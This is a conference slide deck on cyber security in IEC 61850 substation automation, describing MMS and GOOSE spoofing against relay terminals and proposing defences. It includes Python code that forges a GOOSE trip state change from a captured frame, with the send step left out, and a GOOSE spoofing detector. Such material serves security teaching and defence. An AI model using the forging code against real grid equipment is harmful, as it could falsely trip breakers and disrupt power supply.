Cyber Security in Substation Automation (IEC 61850)
Braguta M.V., Nikandrov M.V.
August 2014
Modern Control Systems: Trends and Risks
Recent trend: migration to Ethernet/IP network protocols
High density of Intelligent Electronic Devices (IEDs) per controlled unit
Real-time telemetry transmission is in high demand
Lack of security at the control device level; default access credentials are commonly left in place
Lack of cyber security knowledge and incident readiness
Major Risks:
Unauthorized remote access to the control room, the devices and the manufacturing process
Information theft; modification or alteration of network data
Possible denial of service or sabotage of the manufacturing process
Industry Incidents by Verticals
[Chart: incident counts by industry vertical]
Energy sector is the most affected industry
The Attack Vectors
Information Disclosure: public websites
Social Networks Risks
[Screenshot: an employee's social network profile listing the employer (JSC MRSK-Centra, belgorodenergo) and 516 friends]
USB devices: Major source of infection
Ransom Blockers at Control Room
IEC 61850 Capabilities
Advantages:
Promotes interoperability between systems from different vendors
Defines a set of basic services
Main protocols: MMS and GOOSE
MMS is a client/server protocol carried over TCP/IP between SCADA and the IEDs; GOOSE is a publisher/subscriber multicast protocol carried directly over Ethernet (EtherType 0x88B8) for fast signalling between IEDs. Neither authenticates messages in the base IEC 61850-8-1 mapping (that is left to the IEC 62351 security extensions), which is what makes the spoofing shown in the following slides possible.
[Diagram: protocol evolution]
1. Spoofing of MMS
Sending false position and control data to the SCADA system
Record network traffic
Analyze transferred data
Construct message
Send to SCADA
Constructing the Message
Sending to SCADA
Video: http://youtu.be/MbxRhQP42N0
2. Spoofing of MMS
Sending a false breaker position to the relay protection terminal
Record network traffic
Analyze transferred data
Construct message
Send to relay terminal
Sending to the Relay Terminal
Video: http://youtu.be/oh5IAN3euK4
Result of the unauthorized command
3. GOOSE spoofing - easy!
Sending false commands to a relay terminal from another relay terminal
Record network traffic
Analyze transferred data
Edit message
Publish the message
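The four steps above, like the record/analyze/construct/send steps of the two MMS slides, come down to decoding BER-TLV fields from a captured frame, changing a few of them and encoding the result again. The following is an added example, not code from the original slides or the authors: a minimal GOOSE decoder/encoder in Python that performs the "edit message" step on a constructed capture. The frame contents (MAC addresses, gocbRef/datSet/goID names, data set layout) are constructed for illustration and not taken from any real substation; the decoder assumes an untagged Ethernet frame and decodes only boolean, bit-string and integer data elements, keeping anything else raw. The final "publish" step, which needs a raw socket on the substation LAN, is deliberately left out.

```python
"""Decode, edit and re-encode an IEC 61850 GOOSE frame (added example, constructed data)."""
import struct

ETHERTYPE_GOOSE = 0x88B8
GOOSE_TAG = 0x61                 # [APPLICATION 1] IECGoosePdu
# Context-specific tags of the IECGoosePdu fields (IEC 61850-8-1), in wire order, with decode kind.
PDU_FIELDS = [(0x80, "gocbRef", "str"), (0x81, "timeAllowedtoLive", "int"), (0x82, "datSet", "str"),
              (0x83, "goID", "str"), (0x84, "t", "raw"), (0x85, "stNum", "int"), (0x86, "sqNum", "int"),
              (0x87, "simulation", "bool"), (0x88, "confRev", "int"), (0x89, "ndsCom", "bool"),
              (0x8A, "numDatSetEntries", "int"), (0xAB, "allData", "data")]
BY_TAG = {t: (n, k) for t, n, k in PDU_FIELDS}
DATA_TAGS = {0x83: "bool", 0x84: "bits", 0x85: "int"}   # Data CHOICE tags decoded; others stay raw
DATA_TAG_OF = {k: t for t, k in DATA_TAGS.items()}

def tlv_iter(buf):
    """Yield (tag, value) for each BER TLV in buf; handles short and long definite lengths."""
    i = 0
    while i < len(buf):
        tag, length = buf[i], buf[i + 1]
        i += 2
        if length & 0x80:                       # long form: low 7 bits = number of length bytes
            n = length & 0x7F
            length = int.from_bytes(buf[i:i + n], "big")
            i += n
        yield tag, buf[i:i + length]
        i += length

def tlv(tag, value):
    """Encode one BER TLV with a definite length."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value

def encode_int(v):
    """Shortest two's-complement BER INTEGER for v (a leading 0x00 keeps positives positive)."""
    return v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True)

def decode(kind, v):
    """Decode a field value by kind; 'data' yields a list of (kind_or_tag, value) elements."""
    if kind == "int": return int.from_bytes(v, "big", signed=True)
    if kind == "str": return v.decode("ascii")
    if kind == "bool": return v != b"\x00"
    if kind == "bits": return (v[0], v[1:])     # first byte = number of unused trailing bits
    if kind == "data": return [(DATA_TAGS.get(t, t), decode(DATA_TAGS.get(t), x)) for t, x in tlv_iter(v)]
    return v                                    # raw (UtcTime, unknown tags)

def encode(kind, val):
    """Inverse of decode."""
    if kind == "int": return encode_int(val)
    if kind == "str": return val.encode("ascii")
    if kind == "bool": return b"\x01" if val else b"\x00"
    if kind == "bits": return bytes([val[0]]) + val[1]
    if kind == "data": return b"".join(tlv(DATA_TAG_OF.get(k, k), encode(k, x)) for k, x in val)
    return val

def parse_goose(frame):
    """Split an untagged Ethernet frame into MACs, APPID and a dict of decoded goosePdu fields."""
    dst, src, etype = frame[:6], frame[6:12], struct.unpack("!H", frame[12:14])[0]
    if etype != ETHERTYPE_GOOSE:                # an 802.1Q-tagged frame would shift this by 4 bytes
        raise ValueError("not a GOOSE frame (EtherType 0x%04x)" % etype)
    appid, length = struct.unpack("!HH", frame[14:18])      # followed by Reserved1, Reserved2
    tag, body = next(tlv_iter(frame[22:14 + length]))
    if tag != GOOSE_TAG:
        raise ValueError("missing goosePdu")
    pdu = {}
    for t, v in tlv_iter(body):
        name, kind = BY_TAG.get(t, (t, "raw"))
        pdu[name] = decode(kind, v)
    return {"dst": dst, "src": src, "appid": appid, "pdu": pdu}

def build_goose(dst, src, appid, pdu):
    """Inverse of parse_goose: re-encode the pdu dict into a complete untagged Ethernet frame."""
    body = b"".join(tlv(t, encode(k, pdu[n])) for t, n, k in PDU_FIELDS if n in pdu)
    pdu_tlv = tlv(GOOSE_TAG, body)
    header = struct.pack("!HHHH", appid, 8 + len(pdu_tlv), 0, 0)   # APPID, Length, Reserved1/2
    return dst + src + struct.pack("!H", ETHERTYPE_GOOSE) + header + pdu_tlv

def forge_state_change(frame, new_values):
    """The 'edit message' step: change data items by index and bump stNum so subscribers treat
    the frame as a fresh state change (sqNum restarts at 0 with every new stNum)."""
    g = parse_goose(frame)
    pdu = dict(g["pdu"])
    data = list(pdu["allData"])
    for idx, val in new_values.items():
        data[idx] = (data[idx][0], val)
    pdu.update(allData=data, stNum=pdu["stNum"] + 1, sqNum=0)
    return build_goose(g["dst"], g["src"], g["appid"], pdu)

# Constructed sample: a trip publisher whose data set is (Trip.stVal, Trip.q), trip currently False.
SAMPLE_PDU = {"gocbRef": "IED1CTRL/LLN0$GO$gcb01", "timeAllowedtoLive": 2000,
              "datSet": "IED1CTRL/LLN0$DS01", "goID": "IED1_Trip", "t": bytes(8), "stNum": 5,
              "sqNum": 12, "simulation": False, "confRev": 1, "ndsCom": False,
              "numDatSetEntries": 2, "allData": [("bool", False), ("bits", (3, b"\x00\x00"))]}
SAMPLE_FRAME = build_goose(bytes.fromhex("010ccd010001"), bytes.fromhex("001122334455"), 1, SAMPLE_PDU)
FORGED_FRAME = forge_state_change(SAMPLE_FRAME, {0: True})   # flip Trip.stVal to True

if __name__ == "__main__":
    print(parse_goose(FORGED_FRAME)["pdu"])
```

The only things that tie a GOOSE frame to its publisher are the source MAC, the destination multicast address and the gocbRef string, all of which are copied unchanged from the capture; a subscriber then accepts the forged frame simply because its stNum is higher than the last one it saw. That is why the slide calls this attack easy, and why the legitimate publisher's next frame (still carrying the old stNum) is the first sign that something happened.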
Edit the Message
Sending the False GOOSE Message
Video: http://youtu.be/fdnPkqIUWfA
Result of the Spoofing
GOOSE spoofing can be applied to all relay terminals certified by Rosseti (Russian power grid company)
Prevention and Protection
The IEC 61850 standard supports RSA digital signatures for GOOSE messages (specified in the IEC 62351-6 security companion standard);
However, none of the IED relays available on the market at the time of this survey (2014) offered support for digital signatures. RSA signing is also hard to fit into the millisecond-scale delivery time that protection GOOSE requires, which is one reason vendor support has lagged.
Antivirus Issue: a false positive is quite dangerous (quarantining a control-system component can halt the process)
Suggestions
Short-term goals:
Stop ignoring the problem;
Allocate time for cyber security personnel education and awareness in the security policy; cover basic cyber security and social engineering at least 1-2 times per year;
Reduce the attack surface and mitigate attack vectors using available methods and security standards;
Long-term goals:
Deploy industrial antivirus solutions certified for the manufacturing zone;
Use intrusion detection and deep packet inspection systems;
Add an integrity control system to protect manufacturing zone subnets and network assets; detect unknown or unauthorized assets inside the network perimeter;
Be able to isolate and manage device firmware and to detect unauthorized access or modifications;
Plan to migrate to authenticated and encrypted network communications in the manufacturing zone (the spoofing shown above is stopped by message authentication, which encryption alone does not provide).
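Intrusion detection and deep packet inspection on the station bus, as suggested above, in practice means checking GOOSE traffic against the sequencing rules of IEC 61850-8-1: stNum increments by one on a state change and sqNum restarts at 0, while between changes stNum is constant and sqNum only grows. The following is an added example, not code from the original slides or the authors: a stateful monitor that applies those rules plus a publisher whitelist. It assumes a decoder has already extracted the source MAC, gocbRef, stNum and sqNum from each frame; the expected-publisher table would normally come from the substation's SCL file, and the table, MAC addresses and capture here are constructed for illustration. Note that this detects spoofing after the fact: the forged frame has already reached every subscriber by the time the alert fires.

```python
"""Sequence-aware GOOSE monitor that flags spoofed or replayed frames (added example, constructed data)."""
from collections import namedtuple

# Header fields any GOOSE decoder yields; MACs kept as colon-separated strings.
Goose = namedtuple("Goose", "src gocbRef stNum sqNum")


class GooseMonitor:
    """Tracks the last (stNum, sqNum) seen per GOOSE control block and checks each new message
    against the IEC 61850-8-1 sequencing rules and a whitelist of publishers."""

    def __init__(self, expected_publishers):
        self.expected = expected_publishers   # gocbRef -> publisher MAC, normally taken from the SCL
        self.state = {}                        # gocbRef -> (stNum, sqNum) of the last frame seen

    def check(self, m):
        """Return a list of alert codes for message m (empty means it looks legitimate)."""
        alerts = []
        expected_src = self.expected.get(m.gocbRef)
        if expected_src is None:
            alerts.append("unknown_gocbref")         # control block not in the engineering data
        elif m.src != expected_src:
            alerts.append("src_mac_mismatch")        # another station publishing this control block
        prev = self.state.get(m.gocbRef)
        if prev is not None:
            st, sq = prev
            if m.stNum == st and m.sqNum <= sq:
                alerts.append("sqnum_replay")        # same state, but the sequence did not advance
            elif m.stNum == st + 1 and m.sqNum != 0:
                alerts.append("sqnum_not_reset")     # a state change must start a new sequence
            elif m.stNum > st + 1:
                alerts.append("stnum_skipped")       # frame jumped ahead of the publisher's counter
            elif m.stNum < st:
                alerts.append("stnum_regression")    # real publisher resuming after a forged bump,
                                                     # or a publisher restart: needs operator triage
        # Track what the subscribers saw, forged frames included, so that the real publisher's
        # next frame is flagged as well. (32-bit counter wrap-around is ignored here.)
        self.state[m.gocbRef] = (m.stNum, m.sqNum)
        return alerts


REF = "IED1CTRL/LLN0$GO$gcb01"
LEGIT, ROGUE = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
# Constructed capture: a normal retransmission run, then several kinds of attacker traffic.
SAMPLE_CAPTURE = [
    Goose(LEGIT, REF, 5, 0), Goose(LEGIT, REF, 5, 1), Goose(LEGIT, REF, 5, 2),
    Goose(ROGUE, REF, 6, 0),                        # forged trip sent from another terminal's MAC
    Goose(LEGIT, REF, 5, 3),                        # real publisher continues: now looks like a regression
    Goose(LEGIT, REF, 5, 3),                        # replayed copy of the previous frame
    Goose(LEGIT, REF, 9, 0),                        # forged frame with spoofed source MAC and a stNum jump
    Goose(LEGIT, "IED9CTRL/LLN0$GO$gcb01", 1, 0),   # control block that is not in the SCL
]


def scan(capture, expected_publishers):
    """Run the monitor over a capture; return [(index, alerts)] for the frames that raised alerts."""
    mon = GooseMonitor(expected_publishers)
    hits = []
    for i, m in enumerate(capture):
        alerts = mon.check(m)
        if alerts:
            hits.append((i, alerts))
    return hits


if __name__ == "__main__":
    for i, alerts in scan(SAMPLE_CAPTURE, {REF: LEGIT}):
        print(i, SAMPLE_CAPTURE[i], alerts)
```

The source-MAC check catches the attack from the slides, where a second relay terminal publishes another terminal's control block; the counter checks are what remain once an attacker also spoofs the MAC, and they also surface the legitimate publisher's next frame as a regression. A stNum regression is equally consistent with a device restart, so these alerts are a trigger for investigation rather than an automatic block.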
Conclusions
Power control systems need a special, carefully designed cyber security policy;
The overall state of the organization's cyber security policy is poor and demands immediate attention;
The organization's cyber security policy must be reconsidered as a whole with respect to the latest local and international standards and advisories, the growing danger of ICS threats and the lack of personnel readiness to detect threats;
Power control systems require a security audit of all facilities, as well as compliance with modern cyber security standards and practices (local and international);
Cyber security requirements must be considered during the design and implementation stages of all new objects and facilities;
All cyber security systems must go through extensive testing before being installed in a control room or connected to power equipment. Testing should be done at the manufacturer as well as at the organization's own test facilities, in an environment close to real-world conditions.
Thank you for your time!
Nikandrov Maksim
nixmak@mail.ru
Special appreciation to Kaspersky Lab
[Network diagram: corporate network and Internet connected through routers to the control center; operator workstations 1 and 2, engineering workstations and a redundant server station on Ethernet switches, connected to the relay protection terminals and the switchgear they control (QS2, QS3, QSG2, QSG3.1, QSG3.2, W2E, K2E, QW2E, 220)]